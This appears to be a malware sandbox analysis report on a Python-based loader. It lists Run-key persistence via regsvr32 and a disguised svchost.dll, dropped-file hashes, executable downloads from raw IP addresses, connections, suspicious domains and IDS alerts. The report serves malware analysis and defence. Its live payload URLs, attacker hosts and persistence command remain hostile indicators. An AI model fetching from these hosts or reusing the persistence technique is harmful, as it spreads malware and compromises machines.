0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000DA00000000000000000000000000000000000000000000009D200000200000009100000064000000320000006400000050000000320000003200000028000000500000003C0000005000000050000000320000005000000050000000500000005000000050000000500000002800000050000000230000002300000023000000230000005000000050000000500000003200000032000000320000007800000078000000500000003C00000050000000500000009700000032000000780000003200000050000000500000005000000050000000000000000100000002000000030000000400000005000000060000000700000008000000090000000A0000000B0000000C0000000D0000000E0000000F000000100000001100000012000000130000001400000015000000160000001700000018000000190000001A0000001B0000001C0000001D0000001E0000001F000000200000002100000022000000230000002400000025000000260000002700000028000000290000002A0000002B0000002C00000000000000000000001F00000000000000B400000032000000D8000000640000006400000000000000000000000000000000000000000000000000000000000000000000000000000000000000DA000000000000000000000000000000000000009D200000200000009100000064000000320000009700000050000000320000003200000028000000500000003C000000500000005000000032000000500000005000000050000000500000005000000050000000500000002800000050000000230000002300000023000000230000005000000050000000500000003200000032000000320000007800000078000000500000003C0000005000000064000000780000003200000078000000780000003200000050000000500000005000000050000000C8000000000000000100000002000000030000000400000005000000060000000700000008000000090000000A0000000B0000000C0000000D0000000E0000000F000000100000001100000012000000130000001400000015000000160000001700000018000000190000001A0000001B0000001C0000001D0000001E0000001F000000200000002100000022000000230000002400000025000000260000002700000028000000290000002A0000002B0000002C0000002D0000002E0000002F00000000000000000000001F00000000000000B400000032000000D8000000640000006400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000002000000030000000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000
(PID) Process:(7912) loader.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:WindowsSecurityHostProcess
Value:
regsvr32.exe /s "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start\svchost.dll"
(PID) Process:(4772) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000040240
Operation:writeName:VirtualDesktop
Value:
10000000303044563096AFED4A643448A750FA41CFC7F708
(PID) Process:(8768) WindowsUpdateLauncher.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:WindowsSecurityHost
Value:
regsvr32.exe /s "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start\svchost.dll"
Executable files
677
Suspicious files
81
Text files
235
Unknown types
0

Dropped files

PID
Process
Filename
Type
4772explorer.exeC:\Users\admin\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.datbinary
MD5:E49C56350AEDF784BFE00E444B879672
SHA256:A8BD235303668981563DFB5AAE338CB802817C4060E2C199B7C84901D57B7E1E
6212main.exeC:\Users\admin\AppData\Local\Temp\_MEI62122\_ctypes.pydexecutable
MD5:29873384E13B0A78EE9857604161514B
SHA256:3CC8500A958CC125809B0467930EBCCE88A09DCC0CEDD7A45FACF3E332F7DB33
6212main.exeC:\Users\admin\AppData\Local\Temp\_MEI62122\_decimal.pydexecutable
MD5:21FCB8E3D4310346A5DC1A216E7E23CA
SHA256:9A0E05274CAD8D90F6BA6BC594261B36BFBDDF4F5CA6846B6367FE6A4E2FDCE4
6212main.exeC:\Users\admin\AppData\Local\Temp\_MEI62122\_lzma.pydexecutable
MD5:D63E2E743EA103626D33B3C1D882F419
SHA256:7C2D2030D5D246739C5D85F087FCF404BC36E1815E69A8AC7C9541267734FC28
6212main.exeC:\Users\admin\AppData\Local\Temp\_MEI62122\_cffi_backend.cp313-win_amd64.pydexecutable
MD5:5CBA92E7C00D09A55F5CBADC8D16CD26
SHA256:0E3D149B91FC7DC3367AB94620A5E13AF6E419F423B31D4800C381468CB8AD85
6212main.exeC:\Users\admin\AppData\Local\Temp\_MEI62122\_hashlib.pydexecutable
MD5:3E540EF568215561590DF215801B0F59
SHA256:0ED7A6ED080499BC6C29D7113485A8A61BDBA93087B010FCA67D9B8289CBE6FA
6212main.exeC:\Users\admin\AppData\Local\Temp\_MEI62122\VCRUNTIME140.dllexecutable
MD5:32DA96115C9D783A0769312C0482A62D
SHA256:8B10C53241726B0ACC9F513157E67FCB01C166FEC69E5E38CA6AADA8F9A3619F
6212main.exeC:\Users\admin\AppData\Local\Temp\_MEI62122\_asyncio.pydexecutable
MD5:56F958EEBBC62305B4BF690D61C78E28
SHA256:50631361EF074BE42D788818AF91D0301D22FA24A970F41F496D8272B92CFE31
6212main.exeC:\Users\admin\AppData\Local\Temp\_MEI62122\_bz2.pydexecutable
MD5:684D656AADA9F7D74F5A5BDCF16D0EDB
SHA256:A5DFB4A663DEF3D2276B88866F6D220F6D30CC777B5D841CF6DBB15C6858017C
6212main.exeC:\Users\admin\AppData\Local\Temp\_MEI62122\_socket.pydexecutable
MD5:566CB4D39B700C19DBD7175BD4F2B649
SHA256:77EBA293FE03253396D7BB6E575187CD026C80766D7A345EB72AD92F0BBBC3AA
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
361
TCP/UDP connections
5 010
DNS requests
193
Threats
1 490

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5084
main.exe
GET
200
154.85.54.80:8989
http://154.85.54.80:8989/02.08.2022.exe
unknown
unknown
5084
main.exe
GET
200
185.156.72.2:80
http://185.156.72.2/files/7700188128/RYNH1rZ.exe
unknown
unknown
5084
main.exe
GET
110.41.169.126:8123
http://110.41.169.126:8123/02.08.2022.exe
unknown
unknown
5084
main.exe
GET
185.156.72.2:80
http://185.156.72.2/files/935629868/b7VRzCg.exe
unknown
unknown
5084
main.exe
GET
185.156.72.61:80
http://185.156.72.61/inc/CapCut-VideoEditing_12.1.02.exe
unknown
malicious
5084
main.exe
GET
185.156.72.61:80
http://185.156.72.61/inc/bitdefender.exe
unknown
malicious
5084
main.exe
GET
185.156.72.2:80
http://185.156.72.2/files/7559408112/4eDsFzc.exe
unknown
unknown
5084
main.exe
GET
200
45.141.233.66:2096
http://45.141.233.66:2096/02.08.2022.exe
unknown
unknown
5084
main.exe
GET
200
113.44.139.80:443
http://113.44.139.80:443/02.08.2022.exe
unknown
unknown
5084
main.exe
GET
101.42.239.131:80
http://101.42.239.131/02.08.2022.exe
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
5944
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4512
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1268
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
5084
main.exe
151.101.2.49:443
urlhaus.abuse.ch
FASTLY
US
whitelisted
5084
main.exe
47.108.162.213:80
Hangzhou Alibaba Advertising Co.,Ltd.
CN
unknown
5084
main.exe
43.163.84.111:80
SG
unknown
5084
main.exe
110.41.169.126:8123
Huawei Cloud Service data center
CN
unknown
5084
main.exe
113.44.139.80:443
CN
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.186.174
whitelisted
urlhaus.abuse.ch
  • 151.101.2.49
  • 151.101.66.49
  • 151.101.130.49
  • 151.101.194.49
whitelisted
linkury.s3-us-west-2.amazonaws.com
  • 52.92.249.138
  • 3.5.82.107
  • 3.5.78.193
  • 52.92.192.34
  • 3.5.85.52
  • 52.218.169.185
  • 52.218.177.249
  • 52.92.202.10
shared
imgredientbatchingsystems.com
  • 2.58.56.13
unknown
www.js-hurling.com
  • 75.98.175.107
malicious
ayeorganization.com
  • 192.250.229.187
unknown
www.nestech.tr.45-89-28-93.cpanel.site
  • 45.89.28.93
unknown
vip.3a9.net
  • 106.125.128.72
unknown
ftp.ywxww.net
  • 60.191.208.187
unknown
raw.githubusercontent.com
  • 185.199.111.133
  • 185.199.109.133
  • 185.199.110.133
  • 185.199.108.133
whitelisted

Threats

PID
Process
Class
Message
5084
main.exe
Potential Corporate Privacy Violation
POLICY [ANY.RUN] Python Suspicious User Agent
5084
main.exe
Potential Corporate Privacy Violation
POLICY [ANY.RUN] Python Suspicious User Agent
5084
main.exe
Potential Corporate Privacy Violation
POLICY [ANY.RUN] Python Suspicious User Agent
5084
main.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
5084
main.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
5084
main.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
5084
main.exe
Potential Corporate Privacy Violation
POLICY [ANY.RUN] Python Suspicious User Agent
5084
main.exe
Potential Corporate Privacy Violation
POLICY [ANY.RUN] Python Suspicious User Agent
5084
main.exe
Potential Corporate Privacy Violation
POLICY [ANY.RUN] Python Suspicious User Agent
5084
main.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
Process
Message
Assiah.exe
Ready to work
Assiah.exe
Initialization
Assiah.exe
Get update information
Assiah.exe
Creating folders
Assiah.exe
Check files for update
Assiah.exe
Check Antharas_FD.ukx
Assiah.exe
Need Update Antharas_FM.ukx
Assiah.exe
Need Update Antharas_FE.ukx
Assiah.exe
Need Update Antharas_FD.ukx
Assiah.exe
Check Antharas_FE.ukx